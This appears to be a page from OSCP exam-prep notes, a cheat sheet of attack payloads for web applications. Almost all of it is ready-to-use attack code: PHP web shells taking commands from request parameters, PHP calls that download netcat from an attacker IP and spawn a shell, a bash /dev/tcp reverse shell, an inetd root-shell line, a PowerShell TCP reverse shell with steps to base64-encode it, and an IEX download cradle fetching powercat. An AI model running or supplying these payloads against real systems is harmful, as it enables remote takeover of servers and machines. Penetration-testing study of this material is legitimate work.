> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/web-applications/payloads.md).

# Payloads

{% embed url="<https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php>" %}

{% embed url="<https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx>" %}

```php
system("powershell -c curl http://10.10.14.6/nc.exe -o C:\\programdata\\nc.exe");
system("C:\\programdata\\nc.exe 10.10.14.6 1337 -e powershell.exe");
```

```php

<?php system($_GET['cmd']) ?> 
<?php system($_REQUEST['cmd']) ?> 
<?php echo shell_exec($_GET['cmd']); ?>
<?php echo shell_exec($_REQUEST['cmd']); ?>

```

```
bash -c 'bash -i >& /dev/tcp/192.168.45.204/1337 0>&1'
```

```
echo '31337 stream tcp nowait root /bin/sh -i'
```

#### Base64 encoded win

```
pwsh
```

```
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.237",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
```

```
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText
```

```
powershell -e <payload>
```

```
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.173:8080/powercat.ps1');powercat -c 192.168.45.173 -p 1337 -e powershell"
```
